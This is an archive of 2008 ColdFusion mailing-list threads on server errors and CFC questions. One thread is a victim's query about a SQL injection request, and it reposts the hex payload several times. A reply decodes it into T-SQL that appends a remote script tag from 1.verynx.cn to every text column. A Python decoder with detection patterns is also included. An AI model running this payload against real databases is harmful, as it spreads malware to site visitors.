Railo US tour

2008-07-21 Thread Gert Franz
Hi all,

we would like to invite you all to attend one of our presentations at 
one of the CFUG's we are visiting. If you like, you can check our 
website or blog for details:
http://www.railo-technologies.com/en/index.cfm?treeID=364
http://www.railo.ch/blog/index.cfm/2008/7/21/US-Tour-is-next

If you are anywhere near one of the CFUGs we are visiting, you are 
very welcome. So, see you sometime in the next 3 weeks.

-- 
Greetings from Switzerland
Gert Franz
Railo Technologies GmbH
[EMAIL PROTECTED]
www.railo.ch

Join our Mailing List
german:http://de.groups.yahoo.com/group/railo/
english:   http://groups.yahoo.com/group/railo_talk/
linked in: http://www.linkedin.com/e/gis/71368/0CF7D323BBC1



~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309323
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: 
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4


CreateObject error on new server

2008-07-21 Thread Dave Phelan
In our application we have a cfc that we instantiate to a variable in certain 
instances.  This has always worked without issue until we got our new server.  
On the new server, when I call the CreateObject method, it produces the error:
The filename, directory name, or volume label syntax is incorrect

The new server is running:
Server 2003
IIS6
And CF7

The old server runs:
Server 2000
IIS5
CF7

The paths on both servers are the same.  The call that fails is:
<cfset LTFunc = CreateObject("component", "/xyz/lts/LTFunctions")>

Any ideas?

Please note my new email address.

David Phelan
Senior CF Developer
LifePoint Informatics (Formerly Labtest.com)
(201) 447-9991 Ext. 318
[EMAIL PROTECTED]




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309324


RE: CreateObject error on new server

2008-07-21 Thread Dave Watts
 In our application we have a cfc that we instantiate to a 
 variable in certain instances.  This has always worked 
 without issue until we got our new server.  On the new 
 server, when I call the CreateObject method, it produces the error:
 The filename, directory name, or volume label syntax is incorrect
 
 The new server is running:
 Server 2003
 IIS6
 And CF7
 
 The old server runs:
 Server 2000
 IIS5
 CF7
 
 The paths on both servers are the same.  The call that fails is:
 <cfset LTFunc = CreateObject("component", "/xyz/lts/LTFunctions")>
 
 Any ideas?

Use dots instead of slashes. Dots are the preferred nomenclature for
specifying path information of CFCs.

Also, make sure you've created the appropriate mapping to the xyz directory
within the CF Administrator.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309325


RE: CreateObject error on new server

2008-07-21 Thread Dave Phelan
I changed it to the dot notation but still got the same error.  We have a map 
to the root and the xyz/lts directory is directly below the root.

Please note my new email address.

David Phelan
Senior CF Developer
LifePoint Informatics (Formerly Labtest.com)
(201) 447-9991 Ext. 318
[EMAIL PROTECTED]


 -Original Message-
 From: Dave Watts [mailto:[EMAIL PROTECTED]
 Sent: Monday, July 21, 2008 9:54 AM
 To: CF-Talk
 Subject: RE: CreateObject error on new server

  In our application we have a cfc that we instantiate to a
  variable in certain instances.  This has always worked
  without issue until we got our new server.  On the new
  server, when I call the CreateObject method, it produces the error:
  The filename, directory name, or volume label syntax is incorrect
 
  The new server is running:
  Server 2003
  IIS6
  And CF7
 
  The old server runs:
  Server 2000
  IIS5
  CF7
 
  The paths on both servers are the same.  The call that fails is:
  <cfset LTFunc = CreateObject("component", "/xyz/lts/LTFunctions")>
 
  Any ideas?

 Use dots instead of slashes. Dots are the preferred nomenclature for
 specifying path information of CFCs.

 Also, make sure you've created the appropriate mapping to the xyz
 directory
 within the CF Administrator.

 Dave Watts, CTO, Fig Leaf Software
 http://www.figleaf.com/

 Fig Leaf Software provides the highest caliber vendor-authorized
 instruction at our training centers in Washington DC, Atlanta,
 Chicago, Baltimore, Northern Virginia, or on-site at your location.
 Visit http://training.figleaf.com/ for more information!

 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309326


RE: CreateObject error on new server

2008-07-21 Thread Andrew Tyrone
 I changed it to the dot notation but still got the same error.  We have
 a map to the root and the xyz/lts directory is directly below the root.

I had a problem like this a long time ago.  Deleting and re-creating the
mapping solved it.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309327


(ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Che Vilnonis
Just was looking at a 'user monitor' page on one of my sites and I saw the
URL string below being called. I've seen several SQL injection URLs before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309328


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Mark Kruger
This is a popular and very malicious SQL injection attack that is making the
rounds:

http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII

-Mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 9:55 AM
To: CF-Talk
Subject: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Just was looking at a 'user monitor' page on one of my sites and I saw the
URL string below being called. I've seen several SQL injection URLs before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861[...] AS
CHAR(4000));EXEC(@S);





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309329


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Gerald Guido
This is some sort of encoding... like BinHex. Spammers use it to obscure
URLs and such. Computers read it just fine. If you look around on the
internets you can find a decoder to render it in human-readable form. You
just need to figure out what sort of encoding they are using.

On Mon, Jul 21, 2008 at 10:54 AM, Che Vilnonis [EMAIL PROTECTED] wrote:

 Just was looking at a 'user monitor' page on one of my sites and I saw the
 URL string below being called. I've seen several SQL injection URLs before,
 but what the heck are they trying to accomplish here? Everything is
 cfqueryparam'ed. Thanks, Che

 /rss.cfm?';DECLARE @S CHAR(4000);SET
 @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
 CHAR(4000));EXEC(@S);



 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309330


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
Read this:
http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII

~Brad

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 9:55 AM
To: CF-Talk
Subject: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Just was looking at a 'user monitor' page on one of my sites and I saw
the URL string below being called. I've seen several SQL injection URLs
before, but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309331


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
Why bother looking around the internet?  Use your SQL server to decode
it!
Simply change the exec to a print statement.  Very important! :)

~Brad

-Original Message-
From: Gerald Guido [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 9:59 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

This is some sort of encoding... like BinHex. Spammers use it to
obscure URLs and such. Computers read it just fine. If you look around on the
internets you can find a decoder to render it in human-readable form.
You just need to figure out what sort of encoding they are using.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309332


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Gerald Guido
Why bother looking around the internet?  Use your SQL server to decode it!

Huh... Learn sumptin new every day. That is why I keep coming back here. ;)

Thanx Brad.

~G~

On Mon, Jul 21, 2008 at 11:06 AM, Brad Wood [EMAIL PROTECTED]
wrote:

 Why bother looking around the internet?  Use your SQL server to decode
 it!
 Simply change the exec to a print statement.  Very important! :)

 ~Brad

 -Original Message-
 From: Gerald Guido [mailto:[EMAIL PROTECTED]
 Sent: Monday, July 21, 2008 9:59 AM
 To: CF-Talk
 Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

 This is some sort of encoding... like BinHex. Spammers use it to
 obscure URLs and such. Computers read it just fine. If you look around on the
 internets you can find a decoder to render it in human-readable form.
 You just need to figure out what sort of encoding they are using.

 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309333


RE: CreateObject error on new server

2008-07-21 Thread Dave Phelan
That did it!  Thanks Very Much!

Please note my new email address.

David Phelan
Senior CF Developer
LifePoint Informatics (Formerly Labtest.com)
(201) 447-9991 Ext. 318
[EMAIL PROTECTED]



 -Original Message-
 From: Andrew Tyrone [mailto:[EMAIL PROTECTED]
 Sent: Monday, July 21, 2008 10:50 AM
 To: CF-Talk
 Subject: RE: CreateObject error on new server

  I changed it to the dot notation but still got the same error.  We
 have
  a map to the root and the xyz/lts directory is directly below the
 root.

 I had a problem like this a long time ago.  Deleting and re-creating
 the
 mapping solved it.


 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309334


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Che Vilnonis
Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861[...] AS
CHAR(4000));EXEC(@S);

-Original Message-
From: Gerald Guido [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 11:12 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Why bother looking around the internet?  Use your SQL server to decode it!

Huh... Learn sumptin new every day. That is why I keep coming back here. ;)

Thanx Brad.

~G~


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309335


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Dave Francis
Can we please stop distributing this script ;)

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 11:32 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309336


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Che Vilnonis
Good point. My bad... 

-Original Message-
From: Dave Francis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 11:39 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Can we please stop distributing this script ;)

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 11:32 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309337


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
Works great for me.  You have to remove the extra line breaks though.
Here is what it does:  

DECLARE @T varchar(255),@C varchar(4000)

-- one row per (table, column) for every column of a user table whose type is
-- ntext (xtype 99), text (35), nvarchar (231) or varchar (167)
DECLARE Table_Cursor CURSOR FOR 
select a.name,
b.name 
from sysobjects a,syscolumns b
where a.id=b.id 
and a.xtype='u' 
and (b.xtype=99 
or b.xtype=35 
or b.xtype=231 
or b.xtype=167) 

OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) 

BEGIN
 -- append the script tag to every value in that column, skipping rows already tagged
 exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor


Did you read the blog I posted?  It explains it all.

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 10:32 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);

-Original Message-
From: Gerald Guido [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 11:12 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Why bother looking around the internet?  Use your SQL server to decode
it!

Huh... Learn sumptin new every day. That is why I keep coming back here.
;)

Thanx Brad.

~G~




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309338

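For readers who want to reproduce Brad's decode without a SQL Server at hand, and to answer Che's original question of what the request is trying to do, here is an added example in Python. It is not code from this thread or from any of its posters. It decodes the hex literal posted above (the same bytes, with the line breaks removed), pulls out the markup the dynamic UPDATE appends to every text column and the script URL inside it, lists the column types the cursor targets, and flags request lines of this shape in an access log, including the URL-encoded form. The three sample request targets and the indicator names are constructed for the example.

```python
"""Decode and flag the CAST/hex SQL injection discussed in this thread.

Added example, not code from the CF-Talk posters. HEX_PAYLOAD is the literal
posted in the thread with the line breaks removed; SAMPLE_REQUESTS and the
indicator names are constructed for this example.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

HEX_PAYLOAD = (
    "4445434C415245204054207661726368617228323535292C404320766172636861"
    "72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F"
    "522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473"
    "20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E"
    "78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33"
    "35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20"
    "5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375"
    "72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30"
    "2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40"
    "432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D"
    "22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D"
    "2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65"
    "3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322"
    "3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162"
    "6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43"
    "7572736F72204445414C4C4F43415445205461626C655F437572736F72"
)

# SQL Server system type ids (syscolumns.xtype) the cursor filters on.
TARGETED_XTYPES = {35: "text", 99: "ntext", 167: "varchar", 231: "nvarchar"}

# Three traits of this payload family; a request matching two of them is flagged.
INDICATORS = {
    "declare_buffer": re.compile(r"DECLARE\s+@\w+\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)", re.I),
    "cast_hex": re.compile(r"CAST\s*\(\s*0x[0-9A-F]+\s+AS\s+N?(?:VAR)?CHAR", re.I),
    "exec_variable": re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.I),
}

# Constructed request targets, in the form they appear in an access log.
SAMPLE_REQUESTS = [
    "/rss.cfm?id=12",
    "/rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x" + HEX_PAYLOAD
    + " AS CHAR(4000));EXEC(@S);",
    "/rss.cfm?id=1%27%3BDECLARE%20%40S%20CHAR(4000)%3BSET%20%40S%3DCAST(0x"
    + HEX_PAYLOAD + "%20AS%20CHAR(4000))%3BEXEC(%40S)%3B",
]


def decode_hex_literal(hex_str: str) -> str:
    """CAST(0x.. AS CHAR) reinterprets the bytes as text, so plain hex decoding recovers the T-SQL."""
    return bytes.fromhex(hex_str).decode("latin-1")


def injected_markup(sql: str) -> Optional[str]:
    """Return the string the dynamic UPDATE appends to every column, with doubled quotes unescaped."""
    match = re.search(r"\]\+''(.*?)''\s+where", sql, re.I | re.S)
    return match.group(1).replace("''", "'") if match else None


def script_sources(markup: str) -> List[str]:
    """External script URLs inside the injected markup: the second stage to block and hunt for."""
    return re.findall(r'<script\s+src="([^"]+)"', markup, re.I)


def targeted_types(sql: str) -> List[str]:
    """Column types the cursor selects, mapped from the numeric xtype ids in the WHERE clause."""
    ids = {int(n) for n in re.findall(r"xtype\s*=\s*(\d+)", sql, re.I)}
    return sorted(TARGETED_XTYPES[i] for i in ids if i in TARGETED_XTYPES)


def inspect_request(request_target: str) -> Dict[str, object]:
    """Classify one request target (path plus query string) and decode any hex literal it carries."""
    decoded = unquote(request_target)  # the encoded variant must be normalised before matching
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    payloads = [decode_hex_literal(h) for h in re.findall(r"0x([0-9A-Fa-f]+)", decoded)
                if len(h) % 2 == 0]
    sources: List[str] = []
    for sql in payloads:
        markup = injected_markup(sql)
        if markup:
            sources.extend(script_sources(markup))
    return {"suspicious": len(hits) >= 2, "indicators": hits,
            "payloads": payloads, "script_sources": sources}


if __name__ == "__main__":
    sql = decode_hex_literal(HEX_PAYLOAD)
    print(sql)
    print("targets:", targeted_types(sql))
    print("injects:", script_sources(injected_markup(sql) or ""))
    for target in SAMPLE_REQUESTS:
        verdict = inspect_request(target)
        print(verdict["suspicious"], verdict["indicators"], verdict["script_sources"])
```

The decode shows why Che's cfqueryparam'ed pages are not at risk from this request: the statement only runs where a page concatenates the raw URL parameter into its SQL, and a bound parameter is delivered to the driver as a value, never parsed as T-SQL. What cfqueryparam cannot do is protect a database that another, unparameterised application shares, which is why the payload walks every text column of every user table rather than one known page; the decoded script URL is the thing to search the database for. The CAST(0x... AS ...) trait is the most stable of the three indicators, since the hex hides whatever keywords a filter on the plain text might catch.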

Problems with switching from application.cfm to application.cfc

2008-07-21 Thread Richard Steele
We are now using CF8 and want to take advantage of features in application.cfc. 
In particular we want to take advantage of the missing template handler of CF8 
application.cfc.  

However, in our current application.cfm file we had defined 20 or so variables 
that were not scoped (e.g. <cfset xcachepath="/cache">). In application.cfc, these 
variables evidently need to be scoped (e.g. <cfset request.xcachepath="/cache">). This 
is a huge website and the thought of searching and replacing these variables 
and then uploading each one of thousands of files to our production server is 
daunting and could take many days of work. 

If there is no work around to the above problem, can the missing template 
handler be used in the application.cfm? 

Many thanks in advance. 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309339


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
I appreciate your concern, but I'm pretty certain the bad people out
there wanting to use this already know how to do it if they haven't
already.

One doesn't have to be too creative to come up with unique ways of
screwing with databases.   

Drop database foo

Crap, I just let another one slip.  Brace yourself for another wave of
attacks...  :)

~Brad

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 10:43 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Good point. My bad... 

-Original Message-
From: Dave Francis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 11:39 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Can we please stop distributing this script ;)

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309340


Instantiated CFC behaving incorrectly in IE7 & Safari, but works in Firefox

2008-07-21 Thread Russ Shakespear
I've got a simple component that I'm instantiating to maintain a persistent 
variable. Basically, the CFC checks for new entries in a table, and if there 
are any, sets this variable to be the last entry's id. The next time the CFC is 
called, it will check for new entries using this variable as the starting 
point.This works perfectly in Firefox, but not IE or Safari. It appears as 
though the variable is never set/stored, and remains at 0. I'm not sure what 
I'm missing, but I can't find any documentation about why a CFC might behave 
differently in different browsers. What am I missing???

I am instantiating the CFC into a session, using an init() method like so:

<cfset session.customerChat = createObject("component", "msg").init(chatSession.session)>

My CFC consists of two methods only:

<cffunction name="init" access="public" output="no" returntype="msg">
    <cfargument name="sid" type="numeric" required="yes">

    <cfset Variables.ssid = arguments.sid>
    <cfset Variables.lastid = 0>
    <cfreturn this>
</cffunction>

<cffunction name="getAllMessages" returntype="query" hint="gets all messages in chat session">

    <!--- variables.dsn is assumed to be set outside these two methods (not shown in the post) --->
    <cfquery name="rsGetAllMsg" datasource="#variables.dsn#">
        SELECT cm.s_id, m_id, message, mtime, cm.o_id, cm.c_id, o_name, c_name, c_question
        FROM chat_messages cm
        LEFT OUTER JOIN chat_operators co
            ON co.o_id = cm.o_id
        LEFT OUTER JOIN chat_customers cc
            ON cc.c_id = cm.c_id
        WHERE cm.s_id = <cfqueryparam value="#Variables.ssid#" cfsqltype="cf_sql_integer">
        AND m_id > <cfqueryparam value="#Variables.lastid#" cfsqltype="cf_sql_integer">
    </cfquery>

    <!--- remember the highest id seen so the next call only returns newer rows --->
    <cfif rsGetAllMsg.recordcount neq 0>
        <cfquery name="getlastid" dbtype="query">
            SELECT max(m_id) AS maxid
            FROM rsGetAllMsg
        </cfquery>
        <cfset Variables.lastid = getlastid.maxid>
    </cfif>

    <cfreturn rsGetAllMsg>
</cffunction>

I would appreciate any help.

Thanks, 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309341


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Che Vilnonis
Yep, read the post. Must have been the line breaks that messed things up. 

-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 11:42 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Works great for me.  You have to remove the extra line breaks though.
Here is what it does:


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309343


RE: Instantiated CFC behaving incorrectly in IE7 & Safari, but works in Firefox

2008-07-21 Thread Dave Watts
 I've got a simple component that I'm instantiating to 
 maintain a persistent variable. Basically, the CFC checks for 
 new entries in a table, and if there are any, sets this 
 variable to be the last entry's id. The next time the CFC is 
 called, it will check for new entries using this variable as 
 the starting point.This works perfectly in Firefox, but not 
 IE or Safari. It appears as though the variable is never 
 set/stored, and remains at 0. I'm not sure what I'm missing, 
 but I can't find any documentation about why a CFC might 
 behave differently in different browsers. What am I missing???

There is nothing in the code you've shown that is browser-specific. So, the
problem is somewhere else.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309342


RE: Problems with switching from application.cfm to application.cfc

2008-07-21 Thread Dave Watts
 However, in our current application.cfm file we had defined 
 20 or so variables that were not scoped (e.g. 
 <cfset xcachepath="/cache">). In application.cfc, these variables 
 evidently need to be scoped (e.g. 
 <cfset request.xcachepath="/cache">). This is a huge website and the 
 thought of searching and replacing these variables and then 
 uploading each one of thousands of files to our production 
 server is daunting and could take many days of work.

You can automate the search and replace of those variables, obviously.

Alternatively, you could place the variables in the local page scope by
adding an onRequest event handler:

<cffunction name="onRequest" ...>
    <cfargument name="targetPage">
    <cfset xcachepath = "/cache">
    ...
    <cfinclude template="#Arguments.targetPage#">
    ...
</cffunction>

Of course, if you do this, you would break any CFC URLs that involve web
services or Flash remoting. But on the other hand, you could go back and add
equivalent Request-scoped variables at your leisure, then remove this when
you're done.

 If there is no work around to the above problem, can the 
 missing template handler be used in the application.cfm? 

There's a missing template handler setting in the CF Administrator. Other
than that, no.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309344


RE: Problems with switching from application.cfm to application.cfc

2008-07-21 Thread Adrian Lynch
What happens if you create those unscoped vars in onRequest?

Adrian

-Original Message-
From: Richard Steele [mailto:[EMAIL PROTECTED]
Sent: 21 July 2008 16:44
To: CF-Talk
Subject: Problems with switching from application.cfm to application.cfc


We are now using CF8 and want to take advantage of features in
application.cfc. In particular we want to take advantage of the missing
template handler of CF8 application.cfc.

However, in our current application.cfm file we had defined 20 or so
variables that were not scoped (e.g. xcachepath="/cache"). In
application.cfc, these variables evidently need to be scoped (e.g.
request.xcachepath="/cache"). This is a huge website and the thought of
searching and replacing these variables and then uploading each one of
thousands of files to our production server is daunting and could take many
days of work.

If there is no workaround to the above problem, can the missing template
handler be used in the application.cfm?

Many thanks in advance.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309345


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Gerald Guido
Drop database foo

 Crap, I just let another one slip.  Brace yourself for another wave of
attacks...  :)

Let's not forget what a mess Little Bobby Tables made.

http://xkcd.com/327/


-- 
If everything seems under control, you're not going fast enough
-- Mario Andretti


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309346


Re: Problems with switching from application.cfm to application.cfc

2008-07-21 Thread Richard Steele
It's as if they don't exist. Variable not found errors abound.

